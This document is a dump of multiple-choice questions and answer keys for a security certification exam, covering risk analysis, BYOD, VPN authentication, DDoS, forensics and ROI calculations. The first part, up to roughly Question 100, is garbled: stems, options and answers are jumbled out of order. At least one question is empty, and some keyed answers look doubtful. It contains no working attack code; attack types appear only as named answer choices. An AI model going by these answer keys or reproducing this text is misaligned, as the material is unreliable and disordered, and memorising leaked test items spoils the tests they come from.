Requirement 5 under 4. and 5 B. 2. A. SSH.Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 75 A system administrator needs to meet the maximum amount of security goals for a new DNS infrastructure. 3. Requirement 5 under 4 C. Requirement 4: The system shall provide integrity for all data at rest. Requirement 1: The system shall provide confidentiality for data in transit and data at rest. Authentication C. Level 2: Requirement 2 under 1. A. Level 1: Requirements 1 and 4. Requirement 3: The system shall implement a file-level encryption scheme. Which of the following security goals does this meet? (Select TWO). Availability B. The administrator deploys DNSSEC extensions to the domain names and infrastructure. Level 2: Requirements 2 and 3 under 1. Level 1: Requirements 1. Level 1: Requirements 1 and 4. Encryption Correct Answer: BC Section: (none) Explanation Explanation/Reference: QUESTION 76 A security engineer is working on a large software development project. Requirement 2: The system shall use SSL. Various security requirements were also documented. various stakeholder requirements were gathered and decomposed to an implementable and testable level. Confidentiality E. or SCP for all data transport. Requirement 5: The system shall perform CRC checks on all files. As part of the design of the project. Level 2: Requirements 2. Level 1: Requirements 1 and 4. and 3. Level 2: Requirements 4 and 5 . Organize the following security requirements into the correct hierarchy required for an SRTM. Integrity D. Level 3: Requirement 3 under 2 D.

Determine if the requirements can be met with a simpler solution. Security test and evaluation C. Correct Answer: D . C. D. Decrease the current SLA expectations to match the new solution. Which of the following practices satisfy continuous monitoring of authorized information systems? A. As part of running a pilot exercise. Independent verification and validation B. B. Risk assessment Correct Answer: Section: (none) Explanation Explanation/Reference: QUESTION 78 A new internal network segmentation solution will be implemented into the enterprise that consists of 200 internal firewalls. Which of the following would be the FIRST process to perform as a result of these findings? A. it was determined that it takes three changes to deploy a new application onto the network before it is operational.Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 77 An assessor identifies automated methods for identifying security control compliance through validating sensors at the endpoint and at Tier 2. As part of the review ask them to review the control effectiveness. Reuse the firewall infrastructure on other projects. Review to determine if control effectiveness is in line with the complexity of the solution. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution could be met by another solution. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are understood by the business owners around the availability issues. Security now has a significant effect on overall availability. Engage internal auditors to perform a review of the project to determine why and how the project did not meet the security requirements.

Asset management B. Email C. Transference of risk Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 80 The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. Given that the helpdesk staff is located within the company headquarters and 90% of the callers are telecommuters. The helpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. "BYOD clients must meet the company's infrastructure requirements to permit a connection. Instant messaging D. Which of the following is being described? A. The company-issued device has a managed middleware client that restricts the applications allowed on company devices and provides those that are approved. The middleware client provides configuration standardization for both company owned and BYOD to secure data and communication to the device according to industry best practices. IT governance C. which of the following tools should the helpdesk manager use to make the staff more effective at troubleshooting while at the same time reducing company costs? (Select TWO). BYOD E. A. installation. Desktop sharing . Web cameras B. which provides instructions for the purchase. The policy states that. Change management D." The company also issues a memorandum separate from the policy. and use of the middleware client on BYOD.Section: (none) Explanation Explanation/Reference: QUESTION 79 A company has issued a new mobile device policy permitting BYOD and company-issued devices.

F. Privacy could be compromised as patient records can be viewed in uncontrolled areas. Correct Answer: AD Section: (none) Explanation Explanation/Reference: QUESTION 82 A security administrator is tasked with implementing two-factor authentication for the company VPN. the doctors and specialists can interact with the hospital's system. E. The doctors and specialists access patient records over the hospital's guest WiFi network which is isolated from the internal network with appropriate security controls. The VPN is currently configured to authenticate VPN users against a backend RADIUS server. Malware may be on BYOD devices which can extract data via key logging and screen scrapes. D. The guest WiFi may be exploited allowing non-authorized individuals access to confidential patient data. Presence Correct Answer: CE Section: (none) Explanation Explanation/Reference: QUESTION 81 A large hospital has implemented BYOD to allow doctors and specialists the ability to access patient medical records on their tablets. The patient records management system can be accessed from the guest network and requires two factor authentication. C. Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no error messages are displayed to the user during the VPN connection? (Select TWO). B. Using a remote desktop type interface. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable. Which of the following are of MOST concern? (Select TWO). Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. New company policies require a second factor of authentication. and the Information Security Officer has selected PKI as the second factor. A. . Device encryption has not been enabled and will result in a greater likelihood of data loss.

D. configure all layer 3 switches to feed data to the IDS for more effective monitoring. The user's certificate private key must be installed on the VPN concentrator. Correct Answer: B Section: (none) Explanation Explanation/Reference: . D. E. B. The time stamp of the malware in the swap file. The malware file's modify. F. network mapping and fingerprinting is conducted to prepare for further exploitation. Which of the following is the MOST effective solution to protect against unrecognized malware infections? A. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 84 A forensic analyst receives a hard drive containing malware quarantined by the antivirus application. B. which of the following helps to determine when the system became infected? A. The CA's certificate public key must be installed on the VPN concentrator. Implement an application whitelist at all levels of the organization. C. Correct Answer: EF Section: (none) Explanation Explanation/Reference: QUESTION 83 News outlets are beginning to report on a number of retail establishments that are experiencing payment card data breaches. Deploy a network based heuristic IDS. After creating an image and determining the directory location of the malware file. The CA's certificate private key must be installed on the VPN concentrator. C. The VPN concentrator's certificate private key must be signed by the CA and installed on the VPN concentrator. Remove local admin permissions from all users and change anti-virus to a cloud aware. B. After the initial exploit. D. access. The date/time stamp of the malware detection in the antivirus logs.A. The user certificate private key must be signed by the CA. change time properties. push technology. The timeline analysis of the file system. C. The VPN concentrator's certificate private key must be installed on the VPN concentrator. The data exfiltration is enabled by malware on a compromised computer. Update router configuration to pass all network traffic through a new proxy server with advanced malware detection.

The risk of unplanned server outages is reduced. Risk: Offsite replication Mitigation: Multi-site backups C. Which of the following would be the advantage of conducting this kind of penetration test? A. Using documentation provided to them. the pen-test organization can quickly determine areas to focus on. Risk: Shared hardware caused data leakage Mitigation: Strong encryption at rest B. Risk: Data loss from de-duplication Mitigation: Dynamic host bus addressing D. Risk: Combined data archiving Mitigation: Two-factor administrator authentication Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 87 A web services company is planning a one-time high-profile event to be hosted on the corporate website. has requested that his security engineers put temporary preventive controls in place. a company requires a yearly penetration test. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 86 Which of the following describes a risk and mitigation associated with cloud data storage? A. The Chief Information Security Officer (CISO) has asked that it be done under a black box methodology. so Joe. Which of the following would MOST . The results should reflect what attackers may be able to learn about the company. An outage.QUESTION 85 Due to compliance regulations. the Chief Executive Officer (CEO). The results will show an in-depth view of the network and should help pin-point areas of internal weakness. due to an attack. B. would be publicly embarrassing. D. C.

Ensure web services hosting the event use TCP cookies and deny_hosts. D. Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 88 The Chief Executive Officer (CEO) of an Internet service provider (ISP) has decided to limit the company's contribution to worldwide Distributed Denial of Service (DDoS) attacks. Notify customers when services they run are involved in an attack. Block traffic from the ISP's networks destined for blacklisted IPs. Which of the following processes should be followed? . C. B. D. C. B. Contract and configure scrubbing services with third-party DDoS mitigation providers. A. E. Which of the following should the ISP implement? (Select TWO). One system will be upgraded in six months. Scan the ISP's customer networks using an up-to-date vulnerability scanner. There are three legacy applications on the network that cannot meet this policy. Purchase additional bandwidth from the company's Internet service provider. Configure an intrusion prevention system that blocks IPs after detecting too many incomplete sessions. Block traffic with an IP source not allocated to customers from exiting the ISP's network. Prevent the ISP's customers from querying DNS servers other than those hosted by the ISP. and two are not expected to be upgraded or removed from the network. Correct Answer: DE Section: (none) Explanation Explanation/Reference: QUESTION 89 A security policy states that all applications on the network must have a password length of eight characters.appropriately address Joe's concerns? A.

The Business Operations department has determined the loss associated to each attack is $40. $100. $200. Provide a business justification for a risk exception Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 90 A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company's online shopping application. Which of the following is the monetary value earned during the first year of operation? A.000. Which of the following is a more cost effective alternative to buying a new SAN? A. $140. the number of DoS attacks was reduced to one time a year.000 B. Based on heuristic information from the Security Operations Center (SOC). Provide a business justification to avoid the risk D. Enable multipath to increase availability . Inherit the risk for six months C. The cost of the countermeasures was $100.000 D. and will cause costly downtimes if servers run out disk space. After implementing application caching.000 C. Establish a risk matrix B. $60.000. a Denial of Service Attack (DoS) has been successfully executed 5 times a year.000 Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 91 Company ABC's SAN is nearing capacity.A.

The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. attend training. D. Correct Answer: DF Section: (none) Explanation . A backup is running on the thin clients at 9am every morning. Install 10-Gb uplinks between the hosts and the lab to increase network capacity. Interview candidates. This division will require personnel to have high technology skills and industry certifications. The outage lasts for around 10 minutes. Which of the following is the BEST method for this manager to gain insight into this industry to execute the task? A. Add guests with more memory to increase capacity of the infrastructure. G. Attend conferences. webinars. B. The lab desktops are using more memory than is available to the host systems. Attend meetings with staff. C. Which of the following is the MOST likely cause of the problem and the BEST solution? (Select TWO). E.B. and training to remain current with the industry and job requirements Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 93 At 9:00 am each morning. F. after which everything runs properly again. Implement replication to offsite datacenter Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 92 A human resources manager at a software development company has been tasked with recruiting personnel for a new cyber defense division in the company. Install more memory in the thin clients to handle the increased load while booting. all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive. The lab desktops are saturating the network while booting. H. Booting all the lab desktops at the same time is creating excessive I/O. Enable deduplication on the storage pools C. and hire a staffing company that specializes in technology jobs B. Install faster SSD drives in the storage system used in the infrastructure. Implement snapshots to reduce virtual disk size D. internal training. A. and become certified in software management D. Interview employees and managers to discover the industry hot topics and trends C.

Improper handling of client data. which of the following trusted system concepts can be implemented? A. this virtual hardware is indistinguishable from real hardware. can natively integrate with AD. testing. Improper handling of customer data. Continuous chain of trust C. Which of the following would BEST meet the requirement? A. loss of intellectual property and reputation damage Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 95 A security administrator wants to deploy a dedicated storage solution which is inexpensive. interoperability agreement issues and regulatory issues C. Virtual storage . Software-based trust anchor with no root of trust Answer: C QUESTION 94 The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. Geographical regulation issues. allows files to be selectively encrypted and is suitable for a small number of users at a satellite office. loss of intellectual property and interoperability agreement issues B. SAN B. Which of the following risks are MOST likely to occur if adequate controls are not implemented? A. To virtual machines.Explanation/Reference: A popular commercial virtualization platform allows for the creation of virtual hardware. Cultural differences. Functions to be outsourced include: business analysts. Chain of trust with a hardware root of trust D. software development and back office functions that deal with the processing of customer data. Software-based root of trust B. increased cost of doing business and divestiture issues D. By implementing virtualized TPMs. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. NAS C. Virtual SAN D.

UTM C. Antivirus D. Remove the system from the network and disable IPv6 at the router C. provided they are on an approved device list. Locate and remove the unauthorized 6to4 relay from the network D. Disable the switch port and block the 2001::/32 traffic at the firewall Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 97 In order to reduce costs and improve employee satisfaction. The network administrator confirms there is no IPv6 routing into or out of the network. . Which of the following is the BEST course of action? A. DLP Answer: A QUESTION 96 A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. a large corporation is creating a BYOD policy.Correct Answer: B Section: (none) Explanation Explanation/Reference: The risk manager has requested a security solution that is centrally managed. Which of the following security measures would be MOST effective in securing the enterprise under the new policy? (Select TWO). and protects end users' workstations from both known and unknown malicious attacks when connected to either the office or home network. NIPS E. It will allow access to email and remote connections to the corporate enterprise from personal devices. Investigate the network traffic and block UDP port 3544 at the firewall B. Which of the following would BEST meet this requirement? A. can easily be updated. HIPS B.

The security architect notes concerns about data separation. Require smart card authentication for all devices. Enable time of day restrictions for personal devices. D. Job rotation C. an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Correct Answer: BD Section: (none) Explanation Explanation/Reference: Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare. B. Answer: C QUESTION 98 After a security incident. Most of company XYZ's customers are willing to accept the risks of unauthorized disclosure and access to information by outside users. Which of the following would help meet these goals by having co-workers occasionally audit another worker's position? A. Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the virtual machine of another hosted customer. regulatory requirements concerning PII. Which of the following BEST describes the core concerns of the security architect? A. The security architect for company XYZ is reviewing a vendor proposal to reduce company XYZ's hardware costs by combining multiple physical hosts through the use of virtualization technologies. and administrative complexity on the proposal.A. C. Not all of company XYZ's customers require the same level of security and the administrative complexity of maintaining multiple security postures on a single hypervisor negates hardware cost savings. Separation of duties Correct Answer: B Section: (none) Explanation . The availability requirements in SLAs with each hosted customer would have to be re. confidentiality. Least privilege B. Implement NAC to limit insecure devices access. Mandatory vacation D. E. education. C. B. Encrypt data in transit for remote access.written to account for the transfer of virtual machines between physical platforms for regular maintenance. and manufacturing. D. Provide free email software for personal devices.

Refuse LM and only accept NTLMv2 B. Company A's security administrator should use an HTTPS capable browser to transfer the data. The security authentication on the Windows domain is set to the highest level. Company A and B must create a site-to-site IPSec VPN on their respective firewalls. C. E. using company B's API in an automated manner. Company A must install an SSL tunneling software on the financial system. Refuse NTLMv2 and accept LM D. while company B's API supports encryption. therefore the transfer must occur directly between company A's financial system and company B's destination server using the supplied API. Correct Answer: A Section: (none) Explanation . Accept only NTLM Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 100 Company A needs to export sensitive data from its financial system to company B's database. Which of the following settings on the UNIX server would correct this problem? A. Accept only LM C.Explanation/Reference: QUESTION 99 A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. Company A's policy prohibits the use of any intermediary external systems to transfer or store its sensitive data. company A's legacy financial software does not support encryption. Windows users are stating that they cannot authenticate to the UNIX share. Additionally. B. Which of the following will provide end-to-end encryption for the data transfer while adhering to these requirements? A. Company A should use a dedicated MPLS circuit to transfer the sensitive data to company D.

Explanation/Reference:

QUESTION 101
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so
the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially
occur?

A. The data may not be in a usable format.
B. The new storage array is not FCoE based.
C. The data may need a file system check.
D. The new storage array also only has a single controller.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 102
The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP tabletop exercise. The Chief Information Officer (CIO) wants to
determine which additional controls must be implemented to reduce the risk of an extended customer service outage due to the VoIP system being unavailable. Which of
the following BEST describes the scenario presented and the document the ISO is reviewing?

A. The ISO is evaluating the business implications of a recent telephone system failure within the BIA.
B. The ISO is investigating the impact of a possible downtime of the messaging system within the RA.
C. The ISO is calculating the budget adjustment needed to ensure audio/video system redundancy within the RFQ.
D. The ISO is assessing the effect of a simulated downtime involving the telecommunication system within the AAR.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 103
Two universities are making their 802.11n wireless networks available to the other university's students. The infrastructure will pass the student's credentials back to the
home school for authentication via the Internet. The requirements are:
Mutual authentication of clients and authentication server The design should not limit connection speeds
Authentication must be delegated to the home school No passwords should be sent unencrypted
The following design was implemented:
WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security RADIUS proxy servers will be used to forward authentication requests to the home
school The RADIUS servers will have certificates from a common public certificate authority A strong shared secret will be used for RADIUS server authentication Which
of the following security considerations should be added to the design?

A. The transport layer between the RADIUS servers should be secured
B. WPA Enterprise should be used to decrease the network overhead
C. The RADIUS servers should have local accounts for the visiting students
D. Students should be given certificates to use for authentication to the network

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 104
A company is deploying a new iSCSI-based SAN. The requirements are as follows:
SAN nodes must authenticate each other.
Shared keys must NOT be used.
Do NOT use encryption in order to gain performance. Which of the following design specifications meet all the requirements? (Select TWO).

A. Targets use CHAP authentication
B. IPSec using AH with PKI certificates for authentication
C. Fiber channel should be used with AES
D. Initiators and targets use CHAP authentication

E. Fiber channel over Ethernet should be used
F. IPSec using AH with PSK authentication and 3DES
G. Targets have SCSI IDs for authentication

Correct Answer: BD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 105
A large organization has recently suffered a massive credit card breach. During the months of Incident Response, there were multiple attempts to assign blame for whose
fault it was that the incident occurred. In which part of the incident response phase would this be addressed in a controlled and productive manner?

A. During the Identification Phase
B. During the Lessons Learned phase
C. During the Containment Phase
D. During the Preparation Phase

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 106
Three companies want to allow their employees to seamlessly connect to each other's wireless corporate networks while keeping one consistent wireless client
configuration. Each company wants to maintain its own authentication infrastructure and wants to ensure that an employee who is visiting the other two companies is
authenticated by the home office when connecting to the other companies' wireless network. All three companies have agreed to standardize on 802.1x EAP-PEAP-
MSCHAPv2 for client configuration. Which of the following should the three companies implement?

A. The three companies should agree on a single SSID and configure a hierarchical RADIUS system which implements trust delegation.
B. The three companies should implement federated authentication through Shibboleth connected to an LDAP backend and agree on a single SSID.
C. The three companies should implement a central portal-based single sign-on and agree to use the same CA when issuing client certificates.
D. All three companies should use the same wireless vendor to facilitate the use of a shared cloud based wireless controller.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 107
A company has received the contract to begin developing a new suite of software tools to replace an aging collaboration solution. The original collaboration solution has
been in place for nine years, contains over a million lines of code, and took over two years to develop

originally. The SDLC has been broken up into eight primary stages, with each stage requiring an in-depth risk analysis before moving on to the next phase. Which of the
following software development methods is MOST applicable?

A. Spiral model
B. Incremental model
C. Waterfall model
D. Agile model

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 108
A security company is developing a new cloud-based log analytics platform. Its purpose is to allow:
Customers to upload their log files to the "big data" platform Customers to perform remote log search
Customers to integrate into the platform using an API so that third party business intelligence tools can be used for the purpose of trending, insights, and/or discovery
Which of the following are the BEST security considerations to protect data from one customer being disclosed to other customers? (Select THREE).

A. Secure storage and transmission of API keys
B. Secure protocols for transmission of log files and search results
C. At least two years retention of log files in case of e-discovery requests
D. Multi-tenancy with RBAC support
E. Sanitizing filters to prevent upload of sensitive log file contents
F. Encryption of logical volumes on which the customers' log files reside

Correct Answer: ABD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 109

A security administrator wants to calculate the ROI of a security design which includes the purchase of new equipment. The equipment costs $50,000 and it will take 50
hours to install and configure the equipment. The administrator plans to hire a contractor at a rate of $100/hour to do the installation. Given that the new design and
equipment will allow the company to increase revenue and make an additional $100,000 on the first year, which of the following is the ROI expressed as a percentage for
the first year?

A. -45 percent
B. 5.5 percent
C. 45 percent
D. 82 percent

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 110
A security manager is looking into the following vendor proposal for a cloud-based SIEM solution. The intention is that the cost of the SIEM solution will be justified by
having reduced the number of incidents and therefore saving on the amount spent investigating incidents. Proposal: External cloud-based software as a service
subscription costing $5,000 per month. Expected to reduce the number of current incidents per annum by 50%. The company currently has ten security incidents per
annum at an average cost of $10,000 per incident. Which of the following is the ROI for this proposal after three years?

A. -$30,000
B. $120,000
C. $150,000
D. $180,000

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 111
An IT Manager is concerned about errors made during the deployment process for a new model of tablet. Which of the following would suggest best practices and

configuration parameters that technicians could follow during the deployment process?

A. Automated workflow
B. Procedure
C. Corporate standard
D. Guideline
E. Policy

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 112
The DLP solution has been showing some unidentified encrypted data being sent using FTP to a remote server. A vulnerability scan found a collection of Linux servers
that are missing OS level patches. Upon further investigation, a technician notices that there are a few unidentified processes running on a number of the servers. What
would be a key FIRST step for the data security team to undertake at this point?

A. Capture process ID data and submit to anti-virus vendor for review.
B. Reboot the Linux servers, check running processes, and install needed patches.
C. Remove a single Linux server from production and place in quarantine.
D. Notify upper management of a security breach.

E. Conduct a bit level image, including RAM, of one or more of the Linux servers.

Correct Answer: E
Section: (none)
Explanation

Explanation/Reference:

QUESTION 113
An organization has implemented an Agile development process for front end web application development. A new security architect has just joined the company and
wants to integrate security activities into the SDLC. Which of the following activities MUST be mandated to ensure code quality from a security perspective? (Select TWO).

A. Static and dynamic analysis is run as part of integration
B. Security standards and training is performed as part of the project
C. Daily stand-up meetings are held to ensure security requirements are understood
D. For each major iteration penetration testing is performed
E. Security requirements are story boarded and make it into the build
F. A security design is performed at the end of the requirements phase

Correct Answer: AD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 114
A pentester must attempt to crack passwords on a windows domain that enforces strong complex passwords. Which of the following would crack the MOST passwords in
the shortest time period?

A. Online password testing
B. Rainbow tables attack
C. Dictionary attack
D. Brute force attack

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 115
A bank is in the process of developing a new mobile application. The mobile client renders content and communicates back to the company servers via REST/JSON calls.
The bank wants to ensure that the communication is stateless between the mobile application and the web services gateway. Which of the following controls MUST be
implemented to enable stateless communication?

A. Generate a one-time key as part of the device registration process.
B. Require SSL between the mobile application and the web services gateway.
C. The jsession cookie should be stored securely after authentication.
D. Authentication assertion should be stored securely on the client.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 116
An administrator wishes to replace a legacy clinical software product as it has become a security risk. The legacy product generates $10,000 in revenue a month. The new
software product has an initial cost of $180,000 and a yearly maintenance of $2,000 after the first year. However, it will generate $15,000 in revenue per month and be
more secure. How many years until there is a return on investment for this new package?

A. 1
B. 2
C. 3
D. 4

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 117
An IT manager is working with a project manager to implement a new ERP system capable of transacting data between the new ERP system and the legacy system. As
part of this process, both parties must agree to the controls utilized to secure data connections between the two enterprise systems. This is commonly documented in
which of the following formal documents?

A. Memorandum of Understanding
B. Information System Security Agreement
C. Interconnection Security Agreement
D. Interoperability Agreement
E. Operating Level Agreement

Correct Answer: C

In order to reduce costs and administrative overhead. The security administrator decides to remove the no_root_squash directive from the export and add the nosuid directive. The company does not wish to invest heavily in IT infrastructure. Which of the following is true about the security controls implemented by the security administrator? . A public PaaS C. B. the auditor is advising the security administrator to implement additional security controls on the NFS export. the management of a small candy company wishes to explore a cloud service option for the development of its online applications. the security architect wants to outsource identity proofing and second factor digital delivery to the third party. Using a VPN concentrator which supports dual factor via hardware tokens. Using a HSM at the network perimeter to handle network device access. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 120 After reviewing a company's NAS configuration and file system access logs. The solution must support dual factor mutual authentication with strong identity assurance.1x with EAP-TTLS across the infrastructure. A public SaaS D. A private PaaS Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 119 An enterprise must ensure that all devices that connect to its networks have been previously approved. A public IaaS B. Which of the following solutions will address the enterprise requirements? A. Which of the following solutions should be recommended? A. Implementing federated network access with the third party.Section: (none) Explanation Explanation/Reference: QUESTION 118 In an effort to minimize costs. C. Implementing 802. A private SaaS E. D. A private IaaS F.

Removing the no_root_squash directive grants the root user remote NFS read/write access to important files owned by root on the NAS. Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 121 CORRECT TEXT An administrator wants to install a patch to an application. Users with root access on remote NFS client computers can always use the SU command to modify other user's files on the NAS.A. Adding the nosuid directive disables regular users from accessing files owned by the root user over NFS even after using the SU command. D. download. Given the scenario. C. verify and install the patch in the most secure manner. B. . The newly implemented security controls are in place to ensure that NFS encryption can only be controlled by the root user. Instructions: The last install that is completed will be the final submission.

.

D. .A. B. C. Correct Answer: Section: (none) Explanation Explanation/Reference: Please check the explanation part for full details on solution.

MEDIUM. A. After further investigation. Group policy to limit web access B. MEDIUM. MEDIUM Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 123 Company policy requires that all company laptops meet the following baseline requirements: Software requirements: Antivirus Anti-malware Anti-spyware Log monitoring Full-disk encryption Terminal services enabled for RDP Administrative access for local users Hardware restrictions: Bluetooth disabled FireWire disabled WiFi adapter disabled Ann. HIGH. a web developer. Remove administrative access to local users E. Which of the following should be the revised aggregate score? A. a bootkit was discovered and it was trying to access external websites. MEDIUM. LOW C.FinancialHIGHHIGHLOW Client nameMEDIUMMEDIUMHIGH Client addressLOWMEDIUMLOW ----------------------------------------------------------------------------------------------------------------- AGGREGATEMEDIUMMEDIUMMEDIUM The auditor is advising the company to review the aggregate score and submit it to senior management. MEDIUM.QUESTION 122 An IT auditor is reviewing the data classification for a sensitive system. Restrict/disable TELNET access to network resources . HIGH D. The company has classified the data stored in the sensitive system according to the following matrix: DATA TYPECONFIDENTIALITYINTEGRITYAVAILABILITY ---------------------------------------------------------------------------------------------------------------. Restrict VPN access for all mobile users C. reports performance issues with her laptop and is not able to access any network resources. HIGH. Remove full-disk encryption D. LOW B. MEDIUM. Which of the following hardening techniques should be applied to mitigate this specific issue from reoccurring? (Select TWO). HIGH.

Perform vulnerability scanning on a daily basis G. states that she believes Internet facing file transfer servers are being attacked.F. A risk analyst reports to the risk manager that the asset value of the business system is $120. the exposure factor to fires is only 20% due to the fire suppression system installed at the site. Ann. Compare the current activity to the baseline of normal activity Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 125 The risk manager at a small bank wants to use quantitative analysis to determine the ALE of running a business system at a location which is subject to fires during the year. Provide a report showing the file transfer logs of the servers D.000 .000 and. Which of the following is evidence that would aid Ann in making a case to management that action needs to be taken to safeguard these servers? A. Restrict/disable USB access Correct Answer: DG Section: (none) Explanation Explanation/Reference: QUESTION 124 A security analyst. $30. Fires occur in the area on average every four years. Which of the following is the ALE? A. Provide a report of all the IP addresses that are connecting to the systems and their locations B.000 C. $6. Establish alerts at a certain threshold to notify the analyst of high activity C. $24.000 B. based on industry data.

Race condition B. DR. Consequently. Further analysis conducted by the security investigations team indicated that the website allowed customers to update a payment amount for shipping. the system processed the negative balance as zero dollars. A security consultant has been engaged to advise on residual information security concerns with a de. Identify the gaps between the two tests. which of the following BEST provides the procedure that the consultant should follow? A. As a result. Click-jacking C. Duplicate security-based assets should be sold off for commercial gain to ensure that the security posture of the company does not decline. A specially crafted value could be entered and cause a roll over. This needs to be handled by legal representatives well versed in corporate law. several company sub-businesses are in the process of being sold-off. technical. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 127 The finance department for an online shopping website has discovered that a number of customers were able to purchase goods and services without any payments. and policy/awareness perspective. Which of the following BEST describes the application issue? A.merger. D. Use after free .000 Correct Answer: A Section: (none) Explanation Explanation/Reference: QUESTION 126 A company has decided to change its current business direction and refocus on core business. Based on the demerger. resulting in the shipping cost being subtracted from the balance and in some instances resulted in a negative balance. C. Integer overflow D. From a high-level perspective. Perform another penetration test after the de-merger.D. Perform a penetration test for the current state of the company. Identify the current state from a security viewpoint. B. assess what the security gaps will be from a physical. Explain that security consultants are not trained to offer advice on company acquisitions or demergers. $96.

The audit discovers that 40 percent of the desktops do not meet requirements. Correct Answer: B Section: (none) Explanation Explanation/Reference: QUESTION 129 During a new desktop refresh. The desktop applications were configured with the default username and password. Create a separate SSID and require the legacy clients to connect to the wireless network using certificate-based 802. After the upgrade. C. D.E.1x. several critical wireless clients fail to connect because they are only pre-shared key compliant. Which of the following is the MOST likely cause of the noncompliance? A. Correct Answer: A . The patch management system is causing the devices to be noncompliant after issuing the latest patches. 40 percent of the devices use full disk encryption. SQL injection Correct Answer: C Section: (none) Explanation Explanation/Reference: QUESTION 128 An organization recently upgraded its wireless infrastructure to support 802. C. B.1x and requires all clients to use this method. all hosts are hardened at the OS level before deployment to comply with policy. Create a separate SSID and pre-shared WPA2 key on a new network segment and only allow required communication paths. Which of the following provides the MOST secure method of integrating the non-compliant clients into the network? A. none of the affected clients have an upgrade path to put them into compliance with the 802. Create a separate SSID and require the use of dynamic encryption keys. For the foreseeable future.1x requirement. the company is audited for compliance to regulations. D. Create a separate SSID with a pre-shared key to support the legacy clients and rotate the key at random intervals. B. The devices are being modified and settings are being overridden in production. Six months later.

LDAP D. It allows potential customers to fill in certain details about their car and obtain a quote. Cross site scripting attack C. the following patterns were detected: Pattern 1 Analysis of the logs identifies that insurance premium forms are being filled in but only single fields are incrementally being updated. Which of the following are needed to implement these requirements? (Select TWO). Shibboleth F. SQL injection F. Company policies require that users be centrally managed and authenticated and that each user's network access be controlled based on the user's role within the company. Resource exhaustion attack D. and what is the BEST way to defend against it? (Select TWO). due to legacy systems. SAML B. During an investigation. Distributed denial of service H. RADIUS E. Implement an inline WAF and integrate into SIEM G. Input a blacklist of all known BOT malware IPs into the firewall E. Additionally. WAYF C. the central authentication system must support hierarchical trust and the ability to natively authenticate mobile devices and workstations. customer numbers are running out. Which of the following is the attack type the system is susceptible to. A. A. PKI Correct Answer: CD Section: (none) Explanation Explanation/Reference: QUESTION 131 An insurance company has an online quoting system for insurance premiums. a new customer number is created. Pattern 2 For every quote completed. Apply a hidden field that triggers a SIEM alert B. Implement firewall rules to block the attacking IP addresses Correct Answer: CF Section: (none) Explanation .Section: (none) Explanation Explanation/Reference: QUESTION 130 A network engineer wants to deploy user-based authentication across the company's wired and wireless infrastructure at layer 2 of the OSI model.

